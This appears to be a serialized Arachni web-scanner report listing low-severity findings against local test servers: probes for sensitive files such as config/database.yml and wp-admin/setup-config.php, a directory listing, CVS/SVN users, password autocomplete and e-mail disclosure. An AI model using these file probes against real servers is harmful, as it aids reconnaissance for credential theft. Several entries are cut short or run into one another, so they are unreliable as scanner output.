S2VlcC1BbGl2ZQ==
name: Common sensitive file
description: Tries to find common sensitive files on the server.
tags:
- common
- path
- file
- discovery
severity: Low
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common files
variations: []
internal_modname: CommonFiles
internal_modname: CommonFiles
- !ruby/object:Arachni::Issue
verification: false
references:
Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
url: http://localhost:10925/config/database.yml
elem: path
method: ''
name: Common sensitive file
description: Tries to find common sensitive files on the server.
tags:
- common
- path
- file
- discovery
severity: Low
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
opts:
:regexp: ''
url: http://localhost:10925/config/database.yml
injected: database.yml
id: database.yml
elem: path
remarks: {}
method: ''
response: config/database.yml
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTk=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToyNyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common sensitive file
description: Tries to find common sensitive files on the server.
tags:
- common
- path
- file
- discovery
severity: Low
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common files
variations: []
internal_modname: CommonFiles
internal_modname: CommonFiles
- !ruby/object:Arachni::Issue
verification: false
references:
Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
url: http://localhost:10925/_mmDBScripts/MMHTTPDB.php
elem: path
method: ''
name: Common sensitive file
description: Tries to find common sensitive files on the server.
tags:
- common
- path
- file
- discovery
severity: Low
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
opts:
:regexp: ''
url: http://localhost:10925/_mmDBScripts/MMHTTPDB.php
injected: MMHTTPDB.php
id: MMHTTPDB.php
elem: path
remarks: {}
method: ''
response: _mmDBScripts/MMHTTPDB.php
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjU=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToyNyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common sensitive file
description: Tries to find common sensitive files on the server.
tags:
- common
- path
- file
- discovery
severity: Low
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common files
variations: []
internal_modname: CommonFiles
internal_modname: CommonFiles
- !ruby/object:Arachni::Issue
verification: false
references:
Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
url: http://localhost:10925/wp-admin/setup-config.php
elem: path
method: ''
name: Common sensitive file
description: Tries to find common sensitive files on the server.
tags:
- common
- path
- file
- discovery
severity: Low
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
opts:
:regexp: ''
url: http://localhost:10925/wp-admin/setup-config.php
injected: setup-config.php
id: setup-config.php
elem: path
remarks: {}
method: ''
response: wp-admin/setup-config.php
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjU=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToyNyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common sensitive file
description: Tries to find common sensitive files on the server.
tags:
- common
- path
- file
- discovery
severity: Low
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common files
variations: []
internal_modname: CommonFiles
internal_modname: CommonFiles
- !ruby/object:Arachni::Issue
verification: false
references:
Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
url: http://localhost:10925/wp-admin/install.php
elem: path
method: ''
name: Common sensitive file
description: Tries to find common sensitive files on the server.
tags:
- common
- path
- file
- discovery
severity: Low
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
opts:
:regexp: ''
url: http://localhost:10925/wp-admin/install.php
injected: install.php
id: install.php
elem: path
remarks: {}
method: ''
response: wp-admin/install.php
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjA=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToyNyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common sensitive file
description: Tries to find common sensitive files on the server.
tags:
- common
- path
- file
- discovery
severity: Low
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common files
variations: []
internal_modname: CommonFiles
internal_modname: CommonFiles
- !ruby/object:Arachni::Issue
verification: false
references:
Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
url: http://localhost:10925/error_log
elem: path
method: ''
name: Common sensitive file
description: Tries to find common sensitive files on the server.
tags:
- common
- path
- file
- discovery
severity: Low
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
opts:
:regexp: ''
url: http://localhost:10925/error_log
injected: error_log
id: error_log
elem: path
remarks: {}
method: ''
response: error_log
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToyNyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common sensitive file
description: Tries to find common sensitive files on the server.
tags:
- common
- path
- file
- discovery
severity: Low
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common files
variations: []
internal_modname: CommonFiles
internal_modname: CommonFiles
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/548.html
var:
url: http://localhost:10920/some/
elem: server
method: GET
name: Directory listing
description: ! "In most circumstances enabling directory listings is a bad practise\n
\ as it allows an attacker to better grasp the web application's structure."
tags:
- path
- directory
- listing
- index
cwe: '548'
cwe_url: http://cwe.mitre.org/data/definitions/548.html
severity: Low
remedy_guidance: ! "Restrict access to important directories or files by adopting
a need to know requirement for both the document and server root,\n and
turn off features such as Automatic Directory Listings."
mod_name: Directory listing
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/548.html
opts:
:element: server
:regexp: ''
var:
url: http://localhost:10920/some/
injected:
id:
regexp: ''
regexp_match:
elem: server
remarks: {}
method: GET
response: /home/zapotek/workspace/arachni/spec/servers/modules/recon/xst.rb /home/zapotek/workspace/arachni/spec/servers/modules/recon/htaccess_limit.rb /home/zapotek/workspace/arachni/spec/servers/modules/recon/http_put.rb /home/zapotek/workspace/arachni/spec/servers/modules/recon/webdav.rb /home/zapotek/workspace/arachni/spec/servers/modules/recon/allowed_methods.rb /home/zapotek/workspace/arachni/spec/servers/modules/recon/common_directories.rb /home/zapotek/workspace/arachni/spec/servers/modules/recon/interesting_responses.rb /home/zapotek/workspace/arachni/spec/servers/modules/recon/backdoors.rb /home/zapotek/workspace/arachni/spec/servers/modules/recon/backup_files.rb /home/zapotek/workspace/arachni/spec/servers/modules/recon/directory_listing.rb /home/zapotek/workspace/arachni/spec/servers/modules/recon/common_files.rb /home/zapotek/workspace/arachni/spec/servers/modules/recon/grep
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OTM1
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToyOCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Directory listing
description: ! "In most circumstances enabling directory listings is a bad practise\n
\ as it allows an attacker to better grasp the web application's structure."
tags:
- path
- directory
- listing
- index
cwe: '548'
cwe_url: http://cwe.mitre.org/data/definitions/548.html
severity: Low
remedy_guidance: ! "Restrict access to important directories or files by adopting
a need to know requirement for both the document and server root,\n and
turn off features such as Automatic Directory Listings."
mod_name: Directory listing
variations: []
internal_modname: DirectoryListing
internal_modname: DirectoryListing
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/200.html
var:
url: http://localhost:14998/id
elem: body
method: GET
name: CVS/SVN user disclosure
description: A CVS or SVN user is disclosed in the body of the HTML page.
tags: []
cwe: '200'
cwe_url: http://cwe.mitre.org/data/definitions/200.html
severity: Low
remedy_guidance: Remove all CVS and SVN users from the body of the HTML page.
mod_name: CVS/SVN users
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/200.html
opts:
:regexp: ! '(?-mix:\$Id: .* (\w+) Exp \$)'
:match: john_id1
:element: body
var:
url: http://localhost:14998/id
injected:
id:
regexp: ! '(?-mix:\$Id: .* (\w+) Exp \$)'
regexp_match: john_id1
elem: body
remarks: {}
method: GET
response: ! '$Id: https-test.pl 1081 2008-09-30 19:03:23Z john_id1 Exp $ '
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NjA=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTozMiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: CVS/SVN user disclosure
description: A CVS or SVN user is disclosed in the body of the HTML page.
tags: []
cwe: '200'
cwe_url: http://cwe.mitre.org/data/definitions/200.html
severity: Low
remedy_guidance: Remove all CVS and SVN users from the body of the HTML page.
mod_name: CVS/SVN users
variations: []
internal_modname: CvsSvnUsers
internal_modname: CvsSvnUsers
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/200.html
var:
url: http://localhost:14998/id2
elem: body
method: GET
name: CVS/SVN user disclosure
description: A CVS or SVN user is disclosed in the body of the HTML page.
tags: []
cwe: '200'
cwe_url: http://cwe.mitre.org/data/definitions/200.html
severity: Low
remedy_guidance: Remove all CVS and SVN users from the body of the HTML page.
mod_name: CVS/SVN users
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/200.html
opts:
:regexp: ! '(?-mix:\$Id: .* (\w+) (?\n \n"
:element: form
:regexp: ''
var: insecure
url: http://localhost:14682/insecure
injected:
id:
regexp: ''
regexp_match: ! ""
elem: form
remarks: {}
method: GET
response: ! " \n\n \n\n"
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTcy
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTozOCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Password field with auto-complete
description: ! "Some browsers automatically fill-in forms with\n sensitive
user information for fields that don't have\n the auto-complete
feature explicitly disabled."
tags: []
severity: Low
mod_name: Password field with auto-complete
variations: []
internal_modname: PasswordAutocomplete
internal_modname: PasswordAutocomplete
- !ruby/object:Arachni::Issue
verification: false
references: {}
var: insecure_2
url: http://localhost:14682/insecure
elem: form
method: GET
name: Password field with auto-complete
description: ! "Some browsers automatically fill-in forms with\n sensitive
user information for fields that don't have\n the auto-complete
feature explicitly disabled."
tags: []
severity: Low
mod_name: Password field with auto-complete
variations:
- !ruby/object:Arachni::Issue
verification: false
references: {}
opts:
:var: !binary |-
aW5zZWN1cmVfMg==
:match: ! ""
:element: form
:regexp: ''
var: insecure_2
url: http://localhost:14682/insecure
injected:
id:
regexp: ''
regexp_match: ! ""
elem: form
remarks: {}
method: GET
response: ! " \n\n \n\n"
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTcy
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTozOCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Password field with auto-complete
description: ! "Some browsers automatically fill-in forms with\n sensitive
user information for fields that don't have\n the auto-complete
feature explicitly disabled."
tags: []
severity: Low
mod_name: Password field with auto-complete
variations: []
internal_modname: PasswordAutocomplete
internal_modname: PasswordAutocomplete
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://projects.webappsec.org/w/page/13246936/Information%20Leakage
var: Disclosure
url: http://localhost:6217/header
elem: header
method: GET
name: Private IP address disclosure
description: A private IP address is disclosed in the body of the HTML page
tags: []
cwe: '200'
cwe_url: http://cwe.mitre.org/data/definitions/200.html
severity: Low
remedy_guidance: Remove private IP addresses from the body of the HTML pages.
mod_name: Private IP address finder
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://projects.webappsec.org/w/page/13246936/Information%20Leakage
opts:
:var: !binary |-
RGlzY2xvc3VyZQ==
:regexp: (?-mix:(?\n \n"
:element: form
var:
url: http://localhost:7111/captcha
injected:
id:
regexp: (?i-mx:captcha)
regexp_match: ! ""
elem: form
remarks: {}
method: GET
response: ! " \n"
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
ODI=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToyOSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: CAPTCHA protected form
description: Arachni can't audit CAPTCHA protected forms, consider auditing manually.
tags: []
severity: Informational
mod_name: CAPTCHA
variations: []
internal_modname: CAPTCHA
internal_modname: CAPTCHA
- !ruby/object:Arachni::Issue
verification: false
references: {}
var:
url: http://localhost:12932/3
elem: body
method: GET
name: E-mail address disclosure
description: An e-mail address is being disclosed.
tags: []
cwe: '200'
cwe_url: http://cwe.mitre.org/data/definitions/200.html
severity: Informational
remedy_guidance: ! "E-mail addresses should be presented in such\n a
way that it is hard to process them automatically."
mod_name: E-mail address
variations:
- !ruby/object:Arachni::Issue
verification: false
references: {}
opts:
:regexp: (?i-mx:[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4})
:match: a.little.more.unusual@dept.example.com
:element: body
var:
url: http://localhost:12932/3
injected:
id:
regexp: (?i-mx:[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4})
regexp_match: a.little.more.unusual@dept.example.com
elem: body
remarks: {}
method: GET
response: a.little.more.unusual@dept.example.com
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Mzg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTozNCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: E-mail address disclosure
description: An e-mail address is being disclosed.
tags: []
cwe: '200'
cwe_url: http://cwe.mitre.org/data/definitions/200.html
severity: Informational
remedy_guidance: ! "E-mail addresses should be presented in such\n a
way that it is hard to process them automatically."
mod_name: E-mail address
variations: []
internal_modname: EMails
internal_modname: EMails
- !ruby/object:Arachni::Issue
verification: false
references: {}
var:
url: http://localhost:12932/2
elem: body
method: GET
name: E-mail address disclosure
description: An e-mail address is being disclosed.
tags: []
cwe: '200'
cwe_url: http://cwe.mitre.org/data/definitions/200.html
severity: Informational
remedy_guidance: ! "E-mail addresses should be presented in such\n a
way that it is hard to process them automatically."
mod_name: E-mail address
variations:
- !ruby/object:Arachni::Issue
verification: false
references: {}
opts:
:regexp: (?i-mx:[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4})
:match: john32.21d@foo.blah.com
:element: body
var:
url: http://localhost:12932/2
injected:
id:
regexp: (?i-mx:[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4})
regexp_match: john32.21d@foo.blah.com
elem: body
remarks: {}
method: GET
response: john32.21d@foo.blah.com
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjM=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTozNCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: E-mail address disclosure
description: An e-mail address is being disclosed.
tags: []
cwe: '200'
cwe_url: http://cwe.mitre.org/data/definitions/200.html
severity: Informational
remedy_guidance: ! "E-mail addresses should be presented in such\n a
way that it is hard to process them automatically."
mod_name: E-mail address
variations: []
internal_modname: EMails
internal_modname: EMails
- !ruby/object:Arachni::Issue
verification: false
references: {}
var:
url: http://localhost:12932/1
elem: body
method: GET
name: E-mail address disclosure
description: An e-mail address is being disclosed.
tags: []
cwe: '200'
cwe_url: http://cwe.mitre.org/data/definitions/200.html
severity: Informational
remedy_guidance: ! "E-mail addresses should be presented in such\n a
way that it is hard to process them automatically."
mod_name: E-mail address
variations:
- !ruby/object:Arachni::Issue
verification: false
references: {}
opts:
:regexp: (?i-mx:[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4})
:match: john@foo.blah.com
:element: body
var:
url: http://localhost:12932/1
injected:
id:
regexp: (?i-mx:[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4})
regexp_match: john@foo.blah.com
elem: body
remarks: {}
method: GET
response: john@foo.blah.com
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTc=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTozNCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: E-mail address disclosure
description: An e-mail address is being disclosed.
tags: []
cwe: '200'
cwe_url: http://cwe.mitre.org/data/definitions/200.html
severity: Informational
remedy_guidance: ! "E-mail addresses should be presented in such\n a
way that it is hard to process them automatically."
mod_name: E-mail address
variations: []
internal_modname: EMails
internal_modname: EMails
- !ruby/object:Arachni::Issue
verification: false
references: {}
var:
url: http://localhost:12932/0
elem: body
method: GET
name: E-mail address disclosure
description: An e-mail address is being disclosed.
tags: []
cwe: '200'
cwe_url: http://cwe.mitre.org/data/definitions/200.html
severity: Informational
remedy_guidance: ! "E-mail addresses should be presented in such\n a
way that it is hard to process them automatically."
mod_name: E-mail address
variations:
- !ruby/object:Arachni::Issue
verification: false
references: {}
opts:
:regexp: (?i-mx:[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4})
:match: tasos@blah.com
:element: body
var:
url: http://localhost:12932/0
injected:
id:
regexp: (?i-mx:[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4})
regexp_match: tasos@blah.com
elem: body
remarks: {}
method: GET
response: tasos@blah.com
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTQ=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTozNCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: E-mail address disclosure
description: An e-mail address is being disclosed.
tags: []
cwe: '200'
cwe_url: http://cwe.mitre.org/data/definitions/200.html
severity: Informational
remedy_guidance: ! "E-mail addresses should be presented in such\n a
way that it is hard to process them automatically."
mod_name: E-mail address
variations: []
internal_modname: EMails
internal_modname: EMails
- !ruby/object:Arachni::Issue
verification: false
references: {}
var:
url: http://localhost:7085/
elem: body
method: GET
name: HTML object
description: Greps pages for HTML objects.
tags: []
cwe: '200'
cwe_url: http://cwe.mitre.org/data/definitions/200.html
severity: Informational
mod_name: HTML objects
variations:
- !ruby/object:Arachni::Issue
verification: false
references: {}
opts:
:regexp: (?mi-x: